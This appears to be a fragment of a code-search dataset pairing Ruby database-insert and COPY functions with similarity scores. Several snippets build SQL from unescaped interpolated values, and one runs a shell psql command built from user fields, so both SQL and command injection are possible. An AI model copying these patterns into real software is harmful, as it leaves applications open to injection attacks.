"def dbinsert(table, variables, variable_names)\n i = 1\n marks = \"?\"\n while i < variables.length\n marks += \",?\"\n i += 1\n end\n\n v = \"\"\n i = 0\n while i < variables.length\n v += variables[i].to_s \n i += 1\n if i < variables.length\n v += \", \"\n end\n end\n\n return db.execute(\"INSERT INTO #{table}(#{v}) VALUES (#{marks})\", variable_names)\nend",
"def single_insert(table_name, hash)\n status = true\n begin\n columns = []\n values = []\n hash.keys.each do |item|\n columns.push(item)\n values.push(\"'#{hash[item]}'\")\n end\n columns = columns.join(\",\")\n values = values.join(\",\")\n @mysql_client.query(\"INSERT INTO #{table_name} (#{columns}) VALUES (#{values})\")\n rescue\n status = false\n end\n return status\n end",
"def obfuscate(input_io, output_io)\n\n # We assume that every INSERT INTO line occupies one line in the file, with no internal linebreaks.\n input_io.each do |line|\n if table_data = database_helper.parse_insert_statement(line)\n table_name = table_data[:table_name]\n columns = table_data[:column_names]\n if config[table_name]\n output_io.puts obfuscate_bulk_insert_line(line, table_name, columns)\n else\n $stderr.puts \"Deprecated: #{table_name} was not specified in the config. A future release will cause this to be an error. Please specify the table definition or set it to :keep.\"\n output_io.write line\n end\n else\n output_io.write line\n end\n end\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil) end",
"def insert_takoble\n\t\tsql = \"insert into TAKO_List values (?, ?)\"\n\t\treturn sql\n\tend",
"def execute_insert(sql, opts=OPTS)\n synchronize(opts[:server]) do |c|\n if sql.is_a?(Symbol)\n execute_prepared_statement(sql, opts)\n else\n _execute(c, sql, opts)\n end\n _execute(c, \"SELECT IDENTITY_VAL_LOCAL() FROM SYSIBM.SYSDUMMY1\", opts){|stmt| i = stmt.fetch_array.first.to_i; i}\n end\n rescue Connection::Error => e\n raise_error(e)\n end",
"def statement\n [\n \"insert into\",\n @table,\n column_list,\n query_expression,\n ].compact.join(' ')\n end",
"def insert_multi(tablename, arr_hashes, args = {})\n sql = \"INSERT INTO `#{tablename}` (\"\n\n first = true\n if args && args[:keys]\n keys = args[:keys]\n elsif arr_hashes.first.is_a?(Hash)\n keys = arr_hashes.first.keys\n else\n raise \"Could not figure out keys.\"\n end\n\n keys.each do |col_name|\n sql << \",\" unless first\n first = false if first\n sql << quote_column(col_name)\n end\n\n sql << \") VALUES (\"\n\n first = true\n arr_hashes.each do |hash|\n if first\n first = false\n else\n sql << \"),(\"\n end\n\n first_key = true\n if hash.is_a?(Array)\n hash.each do |val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n else\n hash.each do |_key, val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n end\n end\n\n sql << \")\"\n\n return sql if args && args[:return_sql]\n\n query_no_result_set(sql)\n\n if args && args[:return_id]\n first_id = last_id\n raise \"Invalid ID: #{first_id}\" if first_id.to_i <= 0\n ids = [first_id]\n 1.upto(arr_hashes.length - 1) do |count|\n ids << first_id + count\n end\n\n ids_length = ids.length\n arr_hashes_length = arr_hashes.length\n raise \"Invalid length (#{ids_length}, #{arr_hashes_length}).\" if ids_length != arr_hashes_length\n\n return ids\n else\n return nil\n end\n end",
"def process line\n return unless line.gsub!(/^INSERT INTO `\\w+` VALUES \\(/,\"\")\n warn \"bad ending\" unless line.gsub!(/\\);?$/, '')\n line.split(/\\),\\(/).each do |tuple|\n begin\n QUOTED_QUOTE_RE.gsub!(tuple, \"''\")\n emit FasterCSV.parse_line(tuple, :quote_char => \"'\")\n rescue FasterCSV::MalformedCSVError => e\n warn \"#{e}: #{tuple}\"\n end\n \n end\n end",
"def reaktor_insert(row)\n insert_id = 0\n unless row.idstore.nil?\n Log.write_log($import_log, \"reaktor_insert: Table: #{row.table_name} args: #{row.idstore.args * ', '}\")\n else\n Log.write_log($import_log, \"reaktor_insert: Table: #{row.table_name} No IdStore object\")\n end\n query = \"INSERT INTO #{row.table_name} (#{row.get_column_name_string})\\n VALUES (#{(['?']*row.size).join(', ')})\"\n sth = $dbh_ms.prepare(query)\n begin\n sth.execute(*row.get_column_values)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not insert data. Message: #{$!}. query: \\\"#{get_query_string(sth)}\\\"\")\n raise\n exit\n end\n begin\n insert_id = $dbh_ms.func(:insert_id) unless row.idstore.nil?\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not get insert id. Message: #{$!}.\")\n raise\n exit\n end\n if insert_id > 0\n row.store_id(insert_id)\n Log.write_log($import_log, \"Insert id store to table: #{row.table_name} id_store parameters: (#{row.idstore.args * ', '}) id: #{insert_id}\")\n else\n unless row.idstore.nil?\n Log.write_log($import_log, \"No id stored for table: #{row.table_name} id_store parameters: (#{row.idstore.args * ', '})\")\n else\n Log.write_log($import_log, \"No id stored for table: #{row.table_name} No IdStore object\")\n end\n \n end\nend",
"def insert_multi(tablename, arr_hashes, args = {})\n sql = \"INSERT INTO `#{tablename}` (\"\n\n first = true\n if args && args[:keys]\n keys = args[:keys]\n elsif arr_hashes.first.is_a?(Hash)\n keys = arr_hashes.first.keys\n else\n raise \"Could not figure out keys.\"\n end\n\n keys.each do |col_name|\n sql << \",\" unless first\n first = false if first\n sql << quote_column(col_name)\n end\n\n sql << \") VALUES (\"\n\n first = true\n arr_hashes.each do |hash|\n if first\n first = false\n else\n sql << \"),(\"\n end\n\n first_key = true\n if hash.is_a?(Array)\n hash.each do |val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n else\n hash.each do |_key, val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n end\n end\n\n sql << \")\"\n\n return sql if args && args[:return_sql]\n\n query(sql)\n\n if args && args[:return_id]\n first_id = last_id\n raise \"Invalid ID: #{first_id}\" if first_id.to_i <= 0\n ids = [first_id]\n 1.upto(arr_hashes.length - 1) do |count|\n ids << first_id + count\n end\n\n ids_length = ids.length\n arr_hashes_length = arr_hashes.length\n raise \"Invalid length (#{ids_length}, #{arr_hashes_length}).\" unless ids_length == arr_hashes_length\n\n return ids\n else\n return nil\n end\n end",
"def create_rows_and_query(number_rows, number_query, str_length)\n File.open(\"../benchmark/benchmark_#{number_query}_queries.sql\", 'a+') do |file|\n CSV.open(\"./#{number_rows}_rows_data.csv\", 'a+') do |csv|\n number_rows.times do |time|\n random_str1 = random_str(str_length)\n csv << [time + 1, random_str1]\n file.write(\"select * from test_data where random_str = '#{random_str1}';\") if time < number_query\n end\n end\n end\n puts \"CREATE #{number_rows} ROWS DONE\"\nend",
"def setup ()\n db = HTPH::Hathidb::Db.new();\n @conn = db.get_conn();\n @bench = HTPH::Hathibench::Benchmark.new();\n last_id_sql = \"SELECT LAST_INSERT_ID() AS id\";\n str_exist_sql = \"SELECT id, str FROM hathi_str WHERE str = ?\";\n str_insert_sql = \"INSERT INTO hathi_str (str) VALUES (?)\";\n hathi_gd_insert_sql = \"INSERT INTO hathi_gd (gov_doc, file_id, lineno, mongo_id, hashsum, record_id, item_id) VALUES (?, ?, ?, ?, ?, ?, ?)\";\n input_select_sql = \"SELECT id FROM hathi_input_file WHERE file_path = ?\";\n input_insert_sql = \"INSERT INTO hathi_input_file (file_path, date_read) VALUES (?, SYSDATE())\";\n\n @last_id_q = @conn.prepare(last_id_sql);\n @str_exist_q = @conn.prepare(str_exist_sql);\n @str_insert_q = @conn.prepare(str_insert_sql);\n @hathi_gd_insert_q = @conn.prepare(hathi_gd_insert_sql);\n @input_select_q = @conn.prepare(input_select_sql);\n @input_insert_q = @conn.prepare(input_insert_sql);\n\n @sha_digester = Digest::SHA256.new();\n\n @loadfiles = {}; # Write tab-delim data, and when all is done, load into table.\n %w[isbn issn lccn oclc title enumc pubdate publisher sudoc].each do |suffix|\n @loadfiles[suffix] = HTPH::Hathidata::Data.new(\"#{suffix}.dat\");\n end\n\n @infile_cache = {};\nend",
"def do_bulk_load(file, table_name, options={})\n q = \"COPY #{table_name} \"\n q << \"(#{options[:columns].join(',')}) \" if options[:columns]\n q << \"FROM '#{File.expand_path(file)}' \"\n if options[:fields]\n q << \"WITH \"\n q << \"DELIMITER '#{options[:fields][:delimited_by]}' \" if options[:fields][:delimited_by]\n q << \"NULL '#{options[:fields][:null_string]}'\" if options[:fields][:null_string]\n if options[:fields][:enclosed_by] || options[:ignore] && options[:ignore] > 0\n q << \"CSV \"\n q << \"HEADER \" if options[:ignore] && options[:ignore] > 0\n q << \"QUOTE '#{options[:fields][:enclosed_by]}' \" if options[:fields][:enclosed_by]\n end\n end\n \n execute(q)\n end",
"def run_import(argv = ARGV)\n buffer = []\n CSV.open(IMPORT_PATH, {:headers => true}) do |csv|\n csv.each do |row|\n res = @db.execute \"SELECT * FROM coordinates where lat = #{row[0].to_f} AND lng = #{row[1].to_f}\"\n if res.empty?\n sql = \"(#{row[0].to_f}, #{row[1].to_f}, '#{row[2]}')\"\n buffer << sql\n if buffer.length > 0 && (buffer.length % 500) == 0\n sql = \"INSERT INTO coordinates(lat, lng, neighborhood) VALUES \" + buffer.join(\", \\n\") + \";\"\n @db.execute sql\n print '.'\n buffer = []\n end\n end\n end\n\n if buffer.length > 0\n sql = \"INSERT INTO coordinates(lat, lng, neighborhood) VALUES \" + buffer.join(\", \\n\") + \";\"\n @db.execute sql\n print '.'\n end\n puts\n end\n end",
"def write_nutrient_data_table()\n puts <<SQL\ndrop table if exists NUTRIENT_DATA;\ndrop index if exists food_id_idx;\ndrop index if exists nutrient_id_idx;\n\ncreate table NUTRIENT_DATA(\n food_id char(5) not null,\n nutrient_id char(3) not null,\n nutrient_value float not null,\n data_points float not null,\n std_error float default null,\n source_code varchar(2) not null,\n derivation_code char(4) default null,\n food_id_reference char(5) default null,\n added_nutrient char(1) default null,\n number_studies int default null,\n minimum float default null,\n maximum float default null,\n degrees_freedom int default null,\n lower_error_bound float default null,\n upper_error_bound float default null,\n statistical_comments char(10) default null,\n modification_date char(10) default null,\n confidence_code char(1) default null,\n primary key (food_id, nutrient_id)\n);\ncreate index food_id_idx on NUTRIENT_DATA(food_id);\ncreate index nutrient_id_idx on NUTRIENT_DATA(nutrient_id);\n\nSQL\n\n read_data('NUT_DATA.txt') do |fields|\n puts make_insert_statement('NUTRIENT_DATA', fields,\n 'food_id', 'nutrient_id', 'nutrient_value',\n 'data_points', 'std_error', 'source_code',\n 'derivation_code', 'food_id_reference',\n 'added_nutrient', 'number_studies', 'minimum',\n 'maximum', 'degrees_freedom', 'lower_error_bound',\n 'upper_error_bound', 'statistical_comments',\n 'modification_date', 'confidence_code')\n end\nend",
"def db_insert(visit_id)\n \"INSERT INto image_datasets\n (rmr, series_description, path, timestamp, created_at, updated_at, visit_id, \n glob, rep_time, bold_reps, slices_per_volume, scanned_file, 'dicom_study_uid')\n VALUES ('#{@rmr_number}', '#{@series_description}', '#{@directory}', '#{@timestamp.to_s}', '#{DateTime.now}', \n '#{DateTime.now}', '#{visit_id}', '#{self.glob}', '#{@raw_image_files.first.rep_time}', \n '#{@raw_image_files.first.bold_reps}', '#{@raw_image_files.first.num_slices}', '#{@scanned_file}' )\"\n end",
"def create_table_from_csv(name, csv_path)\r\n # Get headers\r\n csv = CSV.open(csv_path, :headers => true)\r\n first = csv.first\r\n unless first\r\n raise \"File Empty!!!\"\r\n end\r\n \r\n # sanitize\r\n headers = first.headers\r\n headers.each_with_index {|e, index|\r\n if e.nil? or e.empty?\r\n headers[index] = \"column_#{index + 1}\"\r\n end\r\n }\r\n headers.map!{|e| e.downcase.underscore }\r\n \r\n # check if every field name is unique\r\n if headers.count != headers.uniq.count\r\n raise \"Field name must be UNIQUE: \\nPlease check your input headers: [#{headers.join(', ')}]\"\r\n end\r\n\r\n # Create table\r\n create_table_sql = headers.map{|e| e == 'id' ? \"\\\"#{e}\\\" integer\" : \"\\\"#{e}\\\" text\"}.join(\",\")\r\n create_table_sql = \"drop table if exists #{name}; create table #{name}( #{create_table_sql} );\"\r\n query(create_table_sql)\r\n\r\n # Dump data\r\n insert_data_sql = headers.map{|e| \"\\\"#{e}\\\"\"}.join(\",\")\r\n insert_data_sql = \"COPY #{name}( #{insert_data_sql} ) FROM '#{csv_path}' DELIMITER ',' CSV HEADER;\"\r\n\r\n # Change output file permission so that postgres user can read it\r\n begin\r\n FileUtils.chmod 0755, csv_path\r\n rescue Exception => ex\r\n puts \"Error while changing file permission\"\r\n end\r\n\r\n if local?\r\n query(insert_data_sql)\r\n else\r\n puts \"\\nWARNING: pushing data to remote server [#{$options[:host]}].\\nBe sure you have the correct version of `psql` command installed\\n\\n\"\r\n insert_data_sql = \"PGPASSWORD=#{$options[:username]} psql -U #{$options[:username]} -h #{$options[:host]} -p #{$options[:listen]} #{$options[:database]} -c \\\"\\\\#{insert_data_sql}\\\"\"\r\n\r\n `#{insert_data_sql}`\r\n `PGPASSWORD=\"\"`\r\n end\r\nend",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def insert(object, table)\n sql = object.to_sql(table)\n execute(sql)\n end",
"def run_insert\n raise DataFactory::NoInsertStatement unless @insert_statement\n\n stmt = db_interface.execute_sql(@insert_statement, *@binds)\n stmt.close\n end",
"def addSQL(statement)\n \n if (@count % 250000 == 0)\n @filecount += 1\n self.clearSQL(@filecount)\n puts \"Now writing to insert-#{@filecount}.sql\"\n end\n\n File.open(\"data/insert-#{@filecount}.sql\", 'a') do |file|\n file.puts(statement)\n @count += 1\n end\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def process\n create, insert, table = extract_sql #Extract mysql create/insert statements from the dump file\n raise \"Couldn't extract create syntax from MySql Dump File\" if create.nil?\n create = escape_create_string(create)\n begin\n @connection.execute(\"DROP TABLE #{table}\") rescue ''#Drop existing table first\n @connection.execute(create) #Recreate the table \n if insert && @import_data\n values = row_values(insert) \n values.each do |val|\n sql = \"INSERT INTO #{table} VALUES #{val}\"\n begin\n @connection.execute(sql) #Insert rows\n rescue Exception => e\n puts e.message\n puts sql\n puts \"table #{table}\"\n end\n end\n else\n puts \"There's no records to be added\" if @import_data && !insert\n end\n rescue Exception => e\n puts e.message\n puts \"table #{table}\"\n end\n end",
"def initialize(fname=\"\", lname=\"\", email=\"\")\n @fname = fname\n @lname = lname\n @email = email\n\n puts `psql -d wdi-november -c \"INSERT INTO users (fname, lname, email) VALUES ('#{fname}','#{lname}', '#{email}')\"`\nend",
"def direct_import_from_csv(dataset, opts = {:to => nil, :delimiter => nil, :header => nil})\n delimiter = opts[:delimiter] || \",\"\n header = \"HEADER\" if opts[:header] == true\n table = opts[:to].table_name\n raise TypeError if dataset.class != String\n ActiveRecord::Base.connection.execute(\"COPY #{table} FROM '#{dataset}' DELIMITER \\'#{delimiter}\\' CSV #{header}\")\n end",
"def insert_rows(rows, field, table_struct, dest_table_name = NEW_TABLE_NAME)\n fields = get_fields(table_struct)\n insert_tmplt = row_sql_insert(dest_table_name, table_struct)\n primary_keys = get_pkey_fields(table_struct) \n errs = []\n row_action_data = []\n del_keys = []\n \n if (rows) then\n rows.each_hash do | row |\n row_action_data << {\n :sql_insert => make_sql_insert_row(fields, insert_tmplt, row), \n :key => make_key_hash_for_row(primary_keys, row)\n }\n end\n end\n\n row_action_data.each { |row|\n begin\n dbres = do_sql_command(row[:sql_insert])\n if dbres.nil?\n del_keys << row[:key]\n end\n rescue Mysql::Error\n if !($! =~ /^Duplicate entry .* for key/).nil?\n # i'll consider a duplicate entry okay for a delete\n LOGGER.warn \"Database error! Duplicate key found on insert, marking for deletion anyway, moving on: #{$!}\"\n del_keys << row[:key]\n else\n #errs << \"Database error, moving on: #{$!}\"\n LOGGER.error \"Database error, not sure what, moving on: #{$!}\"\n end\n end\n }\n\n del_keys\nend",
"def table_insert_query(table, values)\n query = \"insert into #{quote_table_name(table)}\"\n query << '(' << values.keys.map do |column_name|\n quote_column_name(column_name)\n end.join(', ') << ') '\n query << 'values(' << values.map do |column_name, value|\n quote_value(table, column_name, value)\n end.join(', ') << ')'\n query\n end",
"def write_food_description_table()\n puts <<SQL\ndrop table if exists FOOD_DESCRIPTION;\ncreate table FOOD_DESCRIPTION(\n id char(5) not null,\n food_group_id char(4) not null,\n description varchar(200) not null,\n short_description varchar(60) not null,\n common_name varchar(100) default null,\n manufacturer_name varchar(65) default null,\n survey_code char(1) default null,\n refuse_description varchar(135) default null,\n refuse_percentage int default null,\n scientific_name varchar(65) default null,\n nitrogen_factor float default null,\n protein_factor float default null,\n fat_factor float default null,\n carbohydrate_factor float default null,\n primary key (id)\n);\nSQL\n\n read_data('FOOD_DES.txt') do |fields|\n puts make_insert_statement('FOOD_DESCRIPTION', fields,\n 'id', 'food_group_id', 'description',\n 'short_description', 'common_name',\n 'manufacturer_name', 'survey_code',\n 'refuse_description', 'refuse_percentage',\n 'scientific_name', 'nitrogen_factor',\n 'protein_factor', 'fat_factor',\n 'carbohydrate_factor')\n end\nend",
"def insert_sql(*values)\n if values.empty?\n insert_default_values_sql\n else\n values = values[0] if values.size == 1\n \n # if hash or array with keys we need to transform the values\n if @transform && (values.is_a?(Hash) || (values.is_a?(Array) && values.keys))\n values = transform_save(values)\n end\n from = source_list(@opts[:from])\n\n case values\n when Array\n if values.empty?\n insert_default_values_sql\n else\n \"INSERT INTO #{from} VALUES #{literal(values)}\"\n end\n when Hash\n if values.empty?\n insert_default_values_sql\n else\n fl, vl = [], []\n values.each {|k, v| fl << literal(k.is_a?(String) ? k.to_sym : k); vl << literal(v)}\n \"INSERT INTO #{from} (#{fl.join(COMMA_SEPARATOR)}) VALUES (#{vl.join(COMMA_SEPARATOR)})\"\n end\n when Dataset\n \"INSERT INTO #{from} #{literal(values)}\"\n else\n if values.respond_to?(:values)\n insert_sql(values.values)\n else\n \"INSERT INTO #{from} VALUES (#{literal(values)})\"\n end\n end\n end\n end",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def copy_into(table, opts=OPTS)\n data = opts[:data]\n data = Array(data) if data.is_a?(String)\n\n if block_given? && data\n raise Error, \"Cannot provide both a :data option and a block to copy_into\"\n elsif !block_given? && !data\n raise Error, \"Must provide either a :data option or a block to copy_into\"\n end\n\n synchronize(opts[:server]) do |conn|\n conn.execute(copy_into_sql(table, opts))\n begin\n if block_given?\n while buf = yield\n conn.put_copy_data(buf)\n end\n else\n data.each{|buff| conn.put_copy_data(buff)}\n end\n rescue Exception => e\n conn.put_copy_end(\"ruby exception occurred while copying data into PostgreSQL\")\n ensure\n conn.put_copy_end unless e\n while res = conn.get_result\n raise e if e\n check_database_errors{res.check}\n end\n end\n end \n end",
"def to_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n rows.each {|r| s << r.insert_sql(db_type) }\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def create_kitten(db, name, age)\r\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\r\nend",
"def insert_sql_each\n return enum_for(__method__) unless block_given?\n each_row do |row|\n yield table_dataset.insert_sql( row )\n end\n end",
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def visit_Arel_Nodes_InsertStatement o, *a\n [\n \"INSERT INTO #{visit(o.relation).gsub(/\"/, '')}\",\n \"(#{o.columns.map { |x| x.name }.join ', '})\",\n \" VALUES (#{o.values.left.map { |value| value }.join ', '})\"\n ].compact.join ' '\n end",
"def insert_cako\n\t\tsql = \"insert into CacheTako values (?, ?, ?)\"\n\t\treturn sql\n\tend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def log_line_to_sql_insert(line)\n\n # Define patterns for the various events\n patterns = {\n :kill => /(\\d{2})\\/(\\d{2})\\/(\\d{4}) - (\\d{2}):(\\d{2}):(\\d{2}): \"(.*)<([^>])*><([^>]*)><([^>]*)>\" killed \"(.*)<([^>])*><([^>]*)><([^>]*)>\" with \"([^\"]*)\"(.*)/,\n :round_won => /\\(CT \"(\\d*)\"\\) \\(T \"(\\d*)\"\\)/ # TODO: FIX THIS PATTERN\n }\n # NOTE: There are multiple variants of the :round_won event, including\n # \"Target_Bombed\"\n # \"CTs_Win\"\n # etc.\n\n # Test all patterns\n patterns.each do |event, pattern|\n line.scan(pattern) do |matches|\n puts \"Event {{ #{event} - #{matches} }}\"\n case event\n when :kill\n #return \"select * from kills limit 1\"\n return \"insert into kills (killer, killed, weapon, headshot) \n values('#{matches[6]}', '#{matches[10]}', '#{matches[14]}',\n #{matches[15].empty? ? 0 : 1})\"\n when :round_won\n # update the CT vs T counts (for this game/map?)\n when :suicide\n # decrement players kill count\n end\n end\n end\n\n return nil\n\n end"
] |
[
"0.6569321",
"0.65120876",
"0.6489801",
"0.64708847",
"0.6438791",
"0.63468456",
"0.622612",
"0.6213247",
"0.62104845",
"0.6193804",
"0.61814976",
"0.6177956",
"0.61522686",
"0.6113579",
"0.61133456",
"0.6103705",
"0.6092123",
"0.60913783",
"0.60901535",
"0.60656404",
"0.60505426",
"0.6034191",
"0.60150766",
"0.5999434",
"0.5990562",
"0.5949599",
"0.5920795",
"0.59039795",
"0.5900114",
"0.5894411",
"0.58857065",
"0.58272797",
"0.5824622",
"0.58070993",
"0.58021605",
"0.5789368",
"0.57804894",
"0.57594734",
"0.5750567",
"0.5710083",
"0.5691629",
"0.56773907",
"0.56595385",
"0.5657434",
"0.56342745",
"0.5632593",
"0.5629524",
"0.5622252",
"0.56166524",
"0.56132245",
"0.5602631",
"0.55853045",
"0.55707854",
"0.5565726",
"0.55565006",
"0.55456936",
"0.5533055",
"0.5524716",
"0.5523423",
"0.5506135",
"0.55027884",
"0.549756",
"0.54951274",
"0.5494275",
"0.54794014",
"0.5476214",
"0.54722625",
"0.54722625",
"0.54718786",
"0.5469394",
"0.5460127",
"0.54530615",
"0.54513294",
"0.54513294",
"0.5450057",
"0.5440682",
"0.54174423",
"0.54142153",
"0.5409666",
"0.5399474",
"0.53977245",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53847605",
"0.538393",
"0.5379815",
"0.5371533",
"0.5360417",
"0.53559566",
"0.5354844",
"0.5343018",
"0.5339523",
"0.5338919"
] |
0.6786813
|
0
|
SQL for doing fast table output to stdout.
|
def copy_table_sql(table, opts)
  if table.is_a?(String)
    # A raw SQL string is used as-is.
    table
  else
    # Build the optional "(FORMAT ..., ...)" clause; when neither option is
    # given, `options` stays nil and interpolates as an empty string below.
    if opts[:options] || opts[:format]
      options = String.new
      options << " ("
      options << "FORMAT #{opts[:format]}" if opts[:format]
      options << "#{', ' if opts[:format]}#{opts[:options]}" if opts[:options]
      options << ')'
    end
    # A dataset is emitted as a parenthesized subquery; anything else is
    # literalized as a quoted table reference.
    table = if table.is_a?(::Sequel::Dataset)
      "(#{table.sql})"
    else
      literal(table)
    end
    "COPY #{table} TO STDOUT#{options}"
  end
end
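
# --- Usage sketch (not part of the source above) ---
# A minimal illustration of the SQL this helper produces, assuming Sequel's
# mock postgres adapter. The :items table and the option values are
# hypothetical, and the helper is reached via `send` because it is a private
# adapter method rather than public API.
require "sequel"

db = Sequel.connect("mock://postgres")

db.send(:copy_table_sql, :items, {})
# => COPY "items" TO STDOUT

db.send(:copy_table_sql, db[:items].select(:id), {})
# => COPY (SELECT "id" FROM "items") TO STDOUT

db.send(:copy_table_sql, :items, format: :csv, options: "HEADER")
# => COPY "items" TO STDOUT (FORMAT csv, HEADER)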
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def dump_table(io, table_obj)\n #Get SQL for creating table and add it to IO.\n sqls = @args[:db].tables.create(table_obj.name, table_obj.data, :return_sql => true)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n \n #Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n \n \n #Set up rows and way to fill rows.\n rows = []\n block_data = proc do |row|\n rows << row\n @rows_count += 1\n \n if rows.length >= 1000\n self.update_status\n self.dump_insert_multi(io, table_obj, rows)\n end\n end\n \n \n #If a primary column is found then use IDQuery. Otherwise use cloned unbuffered query.\n args = {:idquery => prim_col.name.to_sym} if prim_col\n \n \n #Clone the connecting with array-results and execute query.\n @args[:db].clone_conn(:result => \"array\") do |db|\n db.select(table_obj.name, nil, args, &block_data)\n end\n \n \n #Dump the last rows if any.\n self.dump_insert_multi(io, table_obj, rows) if !rows.empty?\n end",
"def print(sql, *args, io: STDOUT, width: :auto)\n if sql.is_a?(Array) && args.empty?\n records = sql\n else\n records = all sql, *args, into: Hash\n end\n\n ::Simple::SQL.table_print(records, width: width, io: io)\n records\n end",
"def ascii_query(sql,*values)\n sth = self.query(sql,*values)\n rows = sth.fetch_all\n col_names = sth.column_names\n sth.finish\n DBI::Utils::TableFormatter.ascii(col_names, rows)\n end",
"def print_table(table)\r\n if table_exists?(table)\r\n names = get_column_names(table)\r\n puts names.join(\"|\")\r\n table_info = @db.execute(\"SELECT * FROM #{table}\")\r\n print_execute(table_info)\r\n end\r\n end",
